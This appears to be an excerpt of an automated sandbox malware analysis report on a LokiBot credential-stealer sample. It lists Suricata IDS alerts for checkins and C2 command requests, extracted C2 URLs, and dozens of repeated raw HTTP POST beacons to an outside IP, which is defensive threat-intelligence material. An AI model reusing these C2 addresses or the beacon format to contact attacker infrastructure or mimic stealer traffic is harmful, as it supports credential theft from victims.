                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51235 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51235 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51427 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51264 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51521 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51264 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51235 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51235 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51261 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51521 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51427 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51309 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51309 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51309 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51521 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51261 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51261 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51309 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51261 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51261 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51531 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51509 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51427 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51531 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51531 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51427 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51509 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51509 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51427 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51309 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51531 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51531 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51315 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51315 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51315 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51509 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51509 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51250 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51544 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51544 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51544 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51544 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51544 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49718 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51454 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49718 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49718 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49718 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49718 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49745 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49745 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51454 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51454 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51550 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51550 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51550 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51315 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51315 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51550 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51550 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49745 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51454 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51454 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51245 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51245 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51245 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49745 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49745 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51245 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51245 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51581 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51581 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51581 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51582 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51582 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51582 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49713 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49713 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51581 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49713 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51581 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51582 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51582 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49713 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49713 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51368 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51368 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51368 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51368 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51571 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51368 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51571 -> 94.156.177.41:80
                      Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                      Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                      Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                      Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                      Source: global trafficTCP traffic: 192.168.2.8:51227 -> 162.159.36.2:53
                      Source: Joe Sandbox ViewIP Address: 94.156.177.41 94.156.177.41
                      Source: Joe Sandbox ViewASN Name: NET1-ASBG NET1-ASBG
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 180Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 180Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
